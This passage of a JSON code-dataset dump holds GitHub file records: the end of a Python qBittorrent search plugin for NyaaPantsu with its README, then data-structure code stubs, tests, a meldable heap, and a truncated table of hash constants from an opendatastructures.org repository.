self.do_save_data != None:\n if self.do_save_data not in self.current_item:\n self.current_item[self.do_save_data] = ''\n self.current_item[self.do_save_data] = data.strip()\n self.do_save_data = None\n \n def handle_endtag(self, tag):\n if tag == 'tr' and self.do_parse:\n prettyPrinter(self.current_item)\n self.current_item = None\n self.td_ctr = None\n self.do_parse = False\n \n def download_torrent(self, info):\n print (download_file(info))\n \n def search(self, what, cat='all'):\n searchPage = retrieve_url(self.url + '/search?c=' + self.supported_categories[cat] + '&q=' + what.replace(\"%20\", \"+\"))\n parser = self.NyaaPantsuParser(self.url)\n parser.feed(searchPage)\n parser.close()\n \n while parser.has_nestPage:\n parser.has_nestPage = False\n parser.feed(retrieve_url(parser.url_nextPage))\n parser.close()\n "
},
{
"alpha_fraction": 0.7747641801834106,
"alphanum_fraction": 0.7830188870429993,
"avg_line_length": 59.57143020629883,
"blob_id": "224635fd5568331db7fb0c065c862607c646553c",
"content_id": "4ec4e135c42118b67c93dffbc1fb57a0dcdf58af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 848,
"license_type": "permissive",
"max_line_length": 396,
"num_lines": 14,
"path": "/README.md",
"repo_name": "kenken28/NyaaPantsu-qBittorrent-Plugin",
"src_encoding": "UTF-8",
"text": "# NyaaPantsu qBittorrent Plugin\nNyaaPantsu search plugin for qBittorrent\n\nThis plugin uses HTMLParser to parse extract torrent from [NyaaPantsu](https://nyaa.pantsu.cat/). It follows the [qBittorrent Plugin documentation](https://github.com/qbittorrent/search-plugins/wiki/How-to-write-a-search-plugin), and is Inspired by [Yukariin](https://github.com/Yukariin)'s [NyaaTorrent plugin](https://github.com/Yukariin/qBittorrent-Search-Plugins/blob/master/nyaatorrents.py).\n\n# Installation\n0. If you don't see a `Search` tab in your qBittorrent window, click on `View` and check the `Search Engine` option\n1. Choose `Search` tab\n2. Click on `Search plugins...` button\n3. Click on `Install a new one`\n4. Locate [`nyaapantsu.py`](https://raw.githubusercontent.com/kenken28/NyaaPantsu-qBittorrent-Plugin/master/nyaapantsu.py) file\n\n# LISENCE\nMIT License\n"
}
] | 2 |
caprianilgithub/data_structures | https://github.com/caprianilgithub/data_structures | c097bfa9d233be367f35f3696179abf8620daf31 | c70569e3fe3ed608fe1add8ed4f07b41b5da3cb8 | 26b190cbaaafeae2089d1a0145b5a2e3b0d6352b | refs/heads/master | 2021-04-06T06:51:49.019045 | 2018-03-13T16:22:52 | 2018-03-13T16:22:52 | 124,398,171 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4452054798603058,
"alphanum_fraction": 0.5,
"avg_line_length": 9.230769157409668,
"blob_id": "b09e5904f4b4faaa84b27dc3f13f7920632b2e42",
"content_id": "7475a074084bd406a0c7a90958b50260bc5cb9e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/Treap.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * Treap.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"Treap.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.45890411734580994,
"alphanum_fraction": 0.5136986374855042,
"avg_line_length": 10.166666984558105,
"blob_id": "e464e218b604c5fdcad463953d582034bbfd8974",
"content_id": "351b1c902235761be70a754557de7a9d640a9423",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/SEList.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * SEList.cpp\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#include \"SEList.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.46710526943206787,
"alphanum_fraction": 0.5197368264198303,
"avg_line_length": 9.692307472229004,
"blob_id": "02136830eb27d3daac15ef05acb2795245006a31",
"content_id": "374e9ff504258b36c827abbbc44c2d6b6af6bda0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/FastSqrt.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * FastSqrt.cpp\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#include \"FastSqrt.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5100956559181213,
"alphanum_fraction": 0.5324123501777649,
"avg_line_length": 27.841270446777344,
"blob_id": "b182c49ef5d44ef50b0faf5fa3f968c490be1a47",
"content_id": "ca4e0294b51d239edd9a6541923b94f0e3dae124",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1882,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 63,
"path": "/opendatastructures.org/python/ods/meldableheap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"An implementation of Gambin and Malinowsky's randomized meldable heaps\r\n\r\nA. Gambin and A. Malinowski. Randomized meldable priority queues. \r\n Proceedings of the XXVth Seminar on Current Trends in Theory and Practice\r\n of Informatics (SOFSEM'98), pp. 344-349, 1998\r\n\"\"\"\r\n\r\nimport random\r\nfrom base import BaseSet\r\nfrom binarytree import BinaryTree\r\n\r\ndef random_bit():\r\n return random.getrandbits(1) == 0\r\n\r\nclass MeldableHeap(BinaryTree, BaseSet):\r\n class Node(BinaryTree.Node):\r\n def __init__(self, x):\r\n super(MeldableHeap.Node, self).__init__()\r\n self.x = x\r\n \r\n def __init__(self, iterable=[]):\r\n super(MeldableHeap, self).__init__()\r\n self.n = 0\r\n \r\n def _new_node(self, x):\r\n return MeldableHeap.Node(x)\r\n \r\n def find_min(self):\r\n if n == 0: raise IndexError('find_min on empty queue')\r\n return self.r.x\r\n\r\n def add(self, x):\r\n u = self._new_node(x)\r\n self.r = self.merge(u, self.r)\r\n self.r.parent = self.nil\r\n self.n += 1\r\n return True\r\n \r\n def remove(self):\r\n if self.n == 0: raise IndexError('remove from empty heap')\r\n x = self.r.x\r\n self.r = self.merge(self.r.left, self.r.right)\r\n if self.r != self.nil: self.r.parent = self.nil\r\n self.n -= 1\r\n return x\r\n \r\n def merge(self, h1, h2):\r\n if h1 == self.nil: return h2\r\n if h2 == self.nil: return h1\r\n if h2.x < h1.x: (h1, h2) = (h2, h1)\r\n if random_bit():\r\n h1.left = self.merge(h1.left, h2)\r\n h1.left.parent = h1\r\n else:\r\n h1.right = self.merge(h1.right, h2)\r\n h1.right.parent = h1\r\n return h1\r\n \r\n def __iter__(self):\r\n u = self.first_node()\r\n while u != self.nil:\r\n yield u.x\r\n u = self.next_node(u)\r\n\r\n"
},
{
"alpha_fraction": 0.6985294222831726,
"alphanum_fraction": 0.6985294222831726,
"avg_line_length": 17.14285659790039,
"blob_id": "28014c2fc82baee19e6f395b1ff16db74275d531",
"content_id": "2220abd9356a2ab78fe6f8948def5e388bd0f369",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_redblacktree.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from nose.tools import *\r\n\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_rbt():\r\n exercise_sset(ods.RedBlackTree())\r\n\r\n"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5320512652397156,
"avg_line_length": 10,
"blob_id": "a423c30ff1c352ccd5093ca811914e556dad9b16",
"content_id": "b146fc2a150e388b654870c12c8a5bad4bf61aa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/BinaryTrie.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinaryTrie.cpp\r\n *\r\n * Created on: 2012-01-26\r\n * Author: morin\r\n */\r\n\r\n#include \"BinaryTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.47413793206214905,
"alphanum_fraction": 0.5431034564971924,
"avg_line_length": 12.25,
"blob_id": "19b446f7bdf411e4ab694049197ebad539d4e663",
"content_id": "474e7e8838020dea249d6b44578bb3ccde9fea25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 8,
"path": "/opendatastructures.org/cpp/SkiplistSSet.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * SkiplistSSet.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"SkiplistSSet.h\"\r\n\r\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 16.25,
"blob_id": "ebc9dc446a425e7d4312fa7dd7d091c89596c119",
"content_id": "6436fe0a16eb881c06e4cbffc020c408be864d49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 8,
"path": "/opendatastructures.org/python/ods/tests/test_arraystack.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom nose.tools import *\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_as():\r\n exercise_list(ods.ArrayStack())\r\n \r\n"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5320512652397156,
"avg_line_length": 10,
"blob_id": "6a25acdf192a2f2c65d1ce98ed54456efc1bc0bd",
"content_id": "18979914ee95fab7f45eb973c2eef17b5d98cf13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/BlockStore.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BlockStore.cpp\r\n *\r\n * Created on: 2013-07-03\r\n * Author: morin\r\n */\r\n\r\n#include \"BlockStore.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.2911853790283203,
"alphanum_fraction": 0.7117024064064026,
"avg_line_length": 11.984615325927734,
"blob_id": "86a39df8961e463611f1d9b29d72c500010c27dc",
"content_id": "7c6672e3081fa747a42ef930f091a4a4ddab276f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 14544,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 1040,
"path": "/opendatastructures.org/cpp/LinearHashTable.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * LinearHashTable.cpp\r\n *\r\n * Created on: 2011-12-16\r\n * Author: morin\r\n */\r\n\r\n#include \"LinearHashTable.h\"\r\n\r\nnamespace ods {\r\n\r\nunsigned int tab[4][256] =\r\n\t{{0x0069aeff,\r\n\t0x6ac0719e,\r\n\t0x384cd7ee,\r\n\t0xcba78313,\r\n\t0x133ef89a,\r\n\t0xb37979e6,\r\n\t0xa4c4e09c,\r\n\t0x911c738b,\r\n\t0xc7fe9194,\r\n\t0xba8e5dc7,\r\n\t0xe610718c,\r\n\t0x48460ac5,\r\n\t0x6b4d9d43,\r\n\t0x73afeeab,\r\n\t0x051264cb,\r\n\t0x4b3dba93,\r\n\t0x28837665,\r\n\t0xfb80a52b,\r\n\t0xad1c14af,\r\n\t0xb2baf17f,\r\n\t0x35e311a5,\r\n\t0xf7fa2905,\r\n\t0xa973c315,\r\n\t0x00885f47,\r\n\t0x8842622b,\r\n\t0x0445a92c,\r\n\t0x701ba3a0,\r\n\t0xef608902,\r\n\t0x176099ad,\r\n\t0xd240f938,\r\n\t0xb32d83c6,\r\n\t0xb341afb8,\r\n\t0xc3a978fb,\r\n\t0x55ed1f0c,\r\n\t0xb581286e,\r\n\t0x8ff6938e,\r\n\t0x9f11c1c5,\r\n\t0x4d083bd6,\r\n\t0x1aacc2a4,\r\n\t0xdf13f00a,\r\n\t0x1e282712,\r\n\t0x772d354b,\r\n\t0x21e3a7fd,\r\n\t0x4bc932dc,\r\n\t0xe1deb7ba,\r\n\t0x5e868b8a,\r\n\t0xc9331cc6,\r\n\t0xaa931bbf,\r\n\t0xff92aba6,\r\n\t0xe3efc69f,\r\n\t0xda3b8e2a,\r\n\t0xf9b21ec1,\r\n\t0x2fb89674,\r\n\t0x61c87462,\r\n\t0xa553c2f9,\r\n\t0xca01e279,\r\n\t0x35999337,\r\n\t0xf44c4fd3,\r\n\t0x136a2773,\r\n\t0x812607a8,\r\n\t0xbfcd9bbf,\r\n\t0x0b1d15cd,\r\n\t0xc2a0038b,\r\n\t0x029ab4f7,\r\n\t0xcd7c58f9,\r\n\t0xed3821c4,\r\n\t0x325457c6,\r\n\t0x1dc6b295,\r\n\t0x876dcb83,\r\n\t0x52df45fc,\r\n\t0xa01c9fba,\r\n\t0xc938ff66,\r\n\t0x19e52c87,\r\n\t0x03ae67f9,\r\n\t0x7db39e51,\r\n\t0x74f31686,\r\n\t0x5f10e5a3,\r\n\t0x74108d8a,\r\n\t0x64e63104,\r\n\t0xd86a38d6,\r\n\t0x65be2fbb,\r\n\t0xef06049e,\r\n\t0x9bca1dbd,\r\n\t0x06c63e73,\r\n\t0xe97bd103,\r\n\t0xfed3c22c,\r\n\t0x09d10fc6,\r\n\t0xb92633a3,\r\n\t0x21378ebf,\r\n\t0xe37fa54e,\r\n\t0x893c7910,\r\n\t0xc1c74a5a,\r\n\t0x6c23c029,\r\n\t0x4d4b6187,\r\n\t0xd72bb8fb,\r\n\t0x0dbe1118,\r\n\t0x5e0f4188,\r\n\t0xce0d2dc8,\r\n\t0x8dd83231,\r\n\t0x0466ab90,\r\n\t0x814bc11a,\r\n\t0xef688b9b,\r\n\t0x0a03c851,\r\n\t0xca3c984f,\r\n\t0x6df87ca4,\r\n\t0x6b34d1b2,\r\n\t0x2bad5c75,\r\n\t0xaed1b6d8,\r\n\t0x8c73f8b4,\r\n\t0x4577d798,\r\n\t0x5c953767,\r\n\t0xe7da2d51,\r\n\t0x2b9279a0,\r\n\t0x418d9b51,\r\n\t0x8c47ec3d,\r\n\t0x894e6119,\r\n\t0xa0ca769d,\r\n\t0x1c3b16a4,\r\n\t0xa1621b5b,\r\n\t0xa695da53,\r\n\t0x22462819,\r\n\t0xf4b878cf,\r\n\t0x72b4d648,\r\n\t0x1faf4267,\r\n\t0x4ba16750,\r\n\t0x08a9d645,\r\n\t0x6bfb829c,\r\n\t0xe051295f,\r\n\t0x6dd5cd97,\r\n\t0x2e9d1baf,\r\n\t0x6ed6231d,\r\n\t0x6f84cb25,\r\n\t0x9ae60c95,\r\n\t0xbcee55ca,\r\n\t0x6831cd97,\r\n\t0x2ccdbc99,\r\n\t0x9f8a0a81,\r\n\t0xa0b2c08f,\r\n\t0xe957c36b,\r\n\t0x9cb797b5,\r\n\t0x107c6362,\r\n\t0x48dacf5d,\r\n\t0x6e16f569,\r\n\t0x39be78c3,\r\n\t0x6445637f,\r\n\t0xed445ee5,\r\n\t0x8ec45004,\r\n\t0x9ef8a405,\r\n\t0xb5796a45,\r\n\t0x049d5143,\r\n\t0xb3c1d852,\r\n\t0xc36d9b44,\r\n\t0xab0da981,\r\n\t0xff5226b3,\r\n\t0x19169b4c,\r\n\t0x9a49194d,\r\n\t0xba218b42,\r\n\t0xab98c8ee,\r\n\t0x4db02645,\r\n\t0x6faca3c8,\r\n\t0x12c60d2d,\r\n\t0xaf67b750,\r\n\t0xf0f6a855,\r\n\t0xead566d9,\r\n\t0x42d0cccd,\r\n\t0x76a532bb,\r\n\t0x82a6dc35,\r\n\t0xc1c23d0e,\r\n\t0x83d45bd2,\r\n\t0xd7024912,\r\n\t0x97888901,\r\n\t0x2b7cdd2c,\r\n\t0x523742a5,\r\n\t0xecb96b3b,\r\n\t0xd800d833,\r\n\t0x7b4d0c91,\r\n\t0x95c7dd86,\r\n\t0x88880aad,\r\n\t0xf0ce0990,\r\n\t0x7e292a90,\r\n\t0x79ac4437,\r\n\t0x8a9f59cc,\r\n\t0x818444d1,\r\n\t0xae4e735d,\r\n\t0xa529db95,\r\n\t0x58b35661,\r\n\t0xa909a7de,\r\n\t0x9273beaa,\r\n\t0xfe94332c,\r\n\t0x259b88e4,\r\n\t0xc88f4f6a,\r\n\t0x2a9d33ef,\r\n\t0x4b5d106d,\r\n\t0xdc3a9fca,\r\n\t0xa8061cad,\r\n\t0x7679422c,\r\n\t0xaf72ad02,\r\n\t0xc5799ea5,\r\n\t0x306d694d,\r\n\t0x620aad10,\r\n\t0xd188b9dd,\r\n\t0xeff6ad87,\r\n\t0x6b890354,\r\n\t0xb5907cd3,\r\n\t0x733290fc,\r\n\t0x4b6c0733,\r\n\t0x0bad0ebd,\r\n\t0xa049d3ad,\r\n\t0xc9d0cdae,\r\n\t0x9c144d6f,\r\n\t0x5990b63b,\r\n\t0xfa33d8e2,\r\n\t0x9ebeb5a0,\r\n\t0xbc7c5c92,\r\n\t0xd3edd2e6,\r\n\t0x54ae1af6,\r\n\t0xd6ada4bd,\r\n\t0x14094c5a,\r\n\t0x0e3c5adf,\r\n\t0xf1ab60f1,\r\n\t0x74456a66,\r\n\t0x0f3a675a,\r\n\t0x87445d0d,\r\n\t0xa81adc2e,\r\n\t0x0f47a1a5,\r\n\t0x4eedb844,\r\n\t0x9c9cb0ce,\r\n\t0x8bb3d330,\r\n\t0x02df93e6,\r\n\t0x86e3ad51,\r\n\t0x1c1072b9,\r\n\t0xacf3001b,\r\n\t0xbd08c487,\r\n\t0xc2667a11,\r\n\t0xdd5ef664,\r\n\t0xd47b67fb,\r\n\t0x959cca45,\r\n\t0xa7da8e68,\r\n\t0xb75b1e18,\r\n\t0x75201924,\r\n\t0xe689ab8b,\r\n\t0x0f5e6b0a,\r\n\t0x75205923,\r\n\t0xbba35593,\r\n\t0xd24dab24,\r\n\t0x0288caeb,\r\n\t0xcbf022a9,\r\n\t0x392d7ee5,\r\n\t0x16fe493a,\r\n\t0xb6bcadfd,\r\n\t0x9813ec72,\r\n\t0x9aa3d37c,\r\n\t0xee88a59e,\r\n\t0x6cdbad4e,\r\n\t0x6b96aabf,\r\n\t0xcb54d5e5},\r\n\t{0x116fc403,\r\n\t0x260d7e7b,\r\n\t0xdef689e7,\r\n\t0xa5b3d49a,\r\n\t0x921f3594,\r\n\t0xb24c8cba,\r\n\t0x1bdefb3f,\r\n\t0x6519e846,\r\n\t0x24b37253,\r\n\t0x1cc6b12b,\r\n\t0x6f48f06e,\r\n\t0xca90b0db,\r\n\t0x8e20570b,\r\n\t0xda75ed0f,\r\n\t0x1b515143,\r\n\t0x0990a659,\r\n\t0xdcedb6b3,\r\n\t0xec22de79,\r\n\t0xdd56f7a9,\r\n\t0x901194a6,\r\n\t0x4bf3db02,\r\n\t0x5d31787d,\r\n\t0xd24da2ca,\r\n\t0x9fc9bc14,\r\n\t0x9aa38ac9,\r\n\t0xe95972ba,\r\n\t0x8233a732,\r\n\t0xb9d4317e,\r\n\t0x51f9b329,\r\n\t0x94f12c56,\r\n\t0x1ace26e4,\r\n\t0xecda5183,\r\n\t0x1353e547,\r\n\t0x39b99ab3,\r\n\t0x6413ac97,\r\n\t0xeb6b5334,\r\n\t0xdd94ed2b,\r\n\t0x298e9d2c,\r\n\t0xd38abc91,\r\n\t0x3f17ee4e,\r\n\t0x99f8931d,\r\n\t0x88bae7da,\r\n\t0xb5506a36,\r\n\t0x2d7baf6d,\r\n\t0x42a98d2b,\r\n\t0xbb9b94b9,\r\n\t0x58820083,\r\n\t0x521bba4c,\r\n\t0x76699597,\r\n\t0x137b86be,\r\n\t0x8533888e,\r\n\t0xb37316dd,\r\n\t0x284c3de4,\r\n\t0xfe60e3e6,\r\n\t0x94edaa40,\r\n\t0x919c85cd,\r\n\t0x24cb6f23,\r\n\t0x6b446fbd,\r\n\t0xbe933c15,\r\n\t0x2a43951a,\r\n\t0x791a9f90,\r\n\t0x47977c04,\r\n\t0xa6350eec,\r\n\t0x95e817a5,\r\n\t0xffc82e8c,\r\n\t0xad379229,\r\n\t0x6ec9531a,\r\n\t0x8cab29f9,\r\n\t0xb2f18402,\r\n\t0xd0ebdac1,\r\n\t0xd7b559b4,\r\n\t0x7ad30e7c,\r\n\t0xe1d1adb7,\r\n\t0x58a66f9c,\r\n\t0x7a26636a,\r\n\t0x8c865f92,\r\n\t0x65363517,\r\n\t0x732b87db,\r\n\t0x64a1ad52,\r\n\t0x72e87c39,\r\n\t0x0b943e4d,\r\n\t0x532d3593,\r\n\t0xedcf9975,\r\n\t0x44b5bec1,\r\n\t0x13ac91f8,\r\n\t0x6e6f3a76,\r\n\t0x36ac3c6d,\r\n\t0x528a3ecf,\r\n\t0xf3d8cd75,\r\n\t0x8facd64c,\r\n\t0xdb4d13d5,\r\n\t0x80d49a67,\r\n\t0xaa7061d3,\r\n\t0x9486ba8d,\r\n\t0x7454a65b,\r\n\t0x18e7b707,\r\n\t0xd9cc05b9,\r\n\t0x44eb014d,\r\n\t0x28ba26d8,\r\n\t0xa8852791,\r\n\t0xf8dc3053,\r\n\t0xabe46b52,\r\n\t0x9e261d1f,\r\n\t0x768f83dd,\r\n\t0x1c888838,\r\n\t0x6d9b9ce6,\r\n\t0x69e82575,\r\n\t0x2959538f,\r\n\t0xd0ff9685,\r\n\t0x92b4540c,\r\n\t0x7c93035b,\r\n\t0x7cad90ad,\r\n\t0x49aaa908,\r\n\t0x3981f4b8,\r\n\t0x191f4339,\r\n\t0xd0971bfc,\r\n\t0xa7209692,\r\n\t0x0e253cad,\r\n\t0x40e2ee61,\r\n\t0xc5c63486,\r\n\t0xdf4f238b,\r\n\t0x2d3cb89a,\r\n\t0x3b5704b2,\r\n\t0xcc14c2cb,\r\n\t0xb1698d38,\r\n\t0x079c3b9b,\r\n\t0xbb3867e4,\r\n\t0x9f01e223,\r\n\t0x35e69012,\r\n\t0x5c87d888,\r\n\t0x2cea4193,\r\n\t0xee088da5,\r\n\t0x0ea4d5ab,\r\n\t0x8a4906e8,\r\n\t0xf6e5e283,\r\n\t0xee87fa18,\r\n\t0x9f96c751,\r\n\t0x947252c0,\r\n\t0x9b50b97e,\r\n\t0x05952521,\r\n\t0x9440f5ae,\r\n\t0xa0642786,\r\n\t0xebcc62be,\r\n\t0xadccf011,\r\n\t0x00b863e6,\r\n\t0x1c3ab5b3,\r\n\t0x7c701e4b,\r\n\t0xa9565792,\r\n\t0xb1ad459c,\r\n\t0x833ba164,\r\n\t0x89544ae3,\r\n\t0x35540c75,\r\n\t0x198d0fec,\r\n\t0xbe93bf33,\r\n\t0xc28444b3,\r\n\t0xbc3add48,\r\n\t0xb4300c14,\r\n\t0xee0ed408,\r\n\t0xca08ada3,\r\n\t0x0be06480,\r\n\t0xc4dd8ce2,\r\n\t0x61195564,\r\n\t0x5b10a111,\r\n\t0x65cd2b3b,\r\n\t0xcbeb06ae,\r\n\t0xfce70080,\r\n\t0xef40b102,\r\n\t0xfc0bfe6f,\r\n\t0x8111bf20,\r\n\t0xfb166db1,\r\n\t0x3598b2ef,\r\n\t0x1e0e04de,\r\n\t0x1bf7cf2d,\r\n\t0x0de7eaf1,\r\n\t0x829457e0,\r\n\t0xe8865341,\r\n\t0x826272ad,\r\n\t0xb57db2a4,\r\n\t0x7413e6e7,\r\n\t0x416323ff,\r\n\t0x8e08d503,\r\n\t0x1da4dfac,\r\n\t0x983b9a78,\r\n\t0x0fab5fe0,\r\n\t0x585e7a90,\r\n\t0x038cf73c,\r\n\t0xecf90d31,\r\n\t0x046055c8,\r\n\t0x59926d71,\r\n\t0x06959f1f,\r\n\t0x3b8290b7,\r\n\t0x0bb834d9,\r\n\t0xa0dc5bec,\r\n\t0xec9ae604,\r\n\t0x6ebfd59d,\r\n\t0xfeccbab5,\r\n\t0x240bd4ba,\r\n\t0x2df2b232,\r\n\t0xe14e0383,\r\n\t0xd86526ec,\r\n\t0xe3d974fc,\r\n\t0x940662b5,\r\n\t0x81abf5d4,\r\n\t0x8010e6eb,\r\n\t0x700d9849,\r\n\t0x040d0c42,\r\n\t0xc980417b,\r\n\t0x95fa374a,\r\n\t0x724b1448,\r\n\t0x217205ec,\r\n\t0x0153b4bb,\r\n\t0xea55ea92,\r\n\t0x2049d5a1,\r\n\t0x82576f06,\r\n\t0x586fcfeb,\r\n\t0xa975e489,\r\n\t0x14c862e9,\r\n\t0xacb8b52c,\r\n\t0x2f3fb91e,\r\n\t0xce273650,\r\n\t0x66608f4a,\r\n\t0x24f81bb7,\r\n\t0x0382dc34,\r\n\t0x07bdc163,\r\n\t0xc42ad034,\r\n\t0xe63cf998,\r\n\t0x1a61f233,\r\n\t0xd5754ebe,\r\n\t0x37275214,\r\n\t0x2322de2a,\r\n\t0x3a53b9b4,\r\n\t0xab9c6963,\r\n\t0x2f3a51be,\r\n\t0x5066e7c7,\r\n\t0x941bda97,\r\n\t0x75fadceb,\r\n\t0xd05ad081,\r\n\t0xf77d5daf,\r\n\t0xd9879250,\r\n\t0xebf8bf97,\r\n\t0x65be4a70,\r\n\t0x388eda48,\r\n\t0x728173fb,\r\n\t0x05975bfa,\r\n\t0x314dad8a,\r\n\t0x2cb4909f,\r\n\t0xc736b716,\r\n\t0x9007296d,\r\n\t0x4fd61551,\r\n\t0xd4378ccf,\r\n\t0x649aac3e,\r\n\t0xd9ca1a9d,\r\n\t0x16ff16ae,\r\n\t0x8090f1c5,\r\n\t0xfe0c4703,\r\n\t0xc4152307},\r\n\t{0xf07e5e34,\r\n\t0x62114ba6,\r\n\t0xf45ffe22,\r\n\t0xbaa48702,\r\n\t0xe27e48a4,\r\n\t0xc43b4779,\r\n\t0x549a4566,\r\n\t0x93bc4836,\r\n\t0x3b2e8d46,\r\n\t0x3f8a77ae,\r\n\t0x71e2d944,\r\n\t0xc09c5dce,\r\n\t0xebfbfd4f,\r\n\t0x7f8e1c40,\r\n\t0x3c310a69,\r\n\t0x52f62f09,\r\n\t0xb7fd11bb,\r\n\t0xa9d055a7,\r\n\t0xe3bd4654,\r\n\t0x9696ae10,\r\n\t0xdf953225,\r\n\t0x42fd2380,\r\n\t0x69756e5c,\r\n\t0x9d950bc4,\r\n\t0xe2beea59,\r\n\t0xd33daa07,\r\n\t0xe97d31ce,\r\n\t0xd9fb0a49,\r\n\t0x553a27f2,\r\n\t0x7166586f,\r\n\t0xeb04d48c,\r\n\t0x72adb63a,\r\n\t0x340ab99e,\r\n\t0x459b4609,\r\n\t0x481421b7,\r\n\t0x7db83c71,\r\n\t0x192f6c22,\r\n\t0x711852a8,\r\n\t0xc6bd6562,\r\n\t0xb91be2c8,\r\n\t0xefe89dbf,\r\n\t0xc404eb9b,\r\n\t0x9ebc1bc7,\r\n\t0x8dc7eed2,\r\n\t0x4d84efd7,\r\n\t0x0783d7e5,\r\n\t0x3b5ca2f2,\r\n\t0x9997e51c,\r\n\t0x89b432c9,\r\n\t0x72ae9672,\r\n\t0x61d522d9,\r\n\t0xa639fd45,\r\n\t0xa7da3b46,\r\n\t0x696e73ec,\r\n\t0x89581a95,\r\n\t0x4aa25f94,\r\n\t0xd0eb2a48,\r\n\t0x04865f68,\r\n\t0x1cbd651a,\r\n\t0xd6b2afd9,\r\n\t0xd401b965,\r\n\t0xd20aa5a7,\r\n\t0xc0aa1b15,\r\n\t0xfb4ce7af,\r\n\t0x159974c5,\r\n\t0x15d0841d,\r\n\t0x6b2836b4,\r\n\t0xef3b3edf,\r\n\t0xaf2db0b3,\r\n\t0x13106fb6,\r\n\t0xff41d7f9,\r\n\t0xab2a698d,\r\n\t0x68e04dc9,\r\n\t0xe5ee0099,\r\n\t0xe50d4017,\r\n\t0x5ea78d6d,\r\n\t0x2e18fb07,\r\n\t0xfe22b9ff,\r\n\t0x544c05f1,\r\n\t0xc2e10853,\r\n\t0x8d151bd6,\r\n\t0x17ee763a,\r\n\t0xa663ce31,\r\n\t0x4a4b5e33,\r\n\t0x298b13c1,\r\n\t0xd3b40c89,\r\n\t0x121b6b4e,\r\n\t0x59cf0429,\r\n\t0x3d0bab9d,\r\n\t0xd24c5dfe,\r\n\t0x5bb7349f,\r\n\t0xac5dbfe9,\r\n\t0x7eca5ebb,\r\n\t0xadb8b3e3,\r\n\t0x71ab540b,\r\n\t0xc8e3dc0d,\r\n\t0x12e6cd3f,\r\n\t0x8197f22c,\r\n\t0x5ff77265,\r\n\t0xe5641dbc,\r\n\t0x818ab24c,\r\n\t0x627b98f7,\r\n\t0xdd84e1d6,\r\n\t0x531c2346,\r\n\t0xec2f4e3c,\r\n\t0x4a3cb318,\r\n\t0x70cb24fe,\r\n\t0x35c17bfe,\r\n\t0xec91fd18,\r\n\t0x6efb3c18,\r\n\t0x16908369,\r\n\t0x41732188,\r\n\t0x449e658b,\r\n\t0x2e9931cb,\r\n\t0x67cd066e,\r\n\t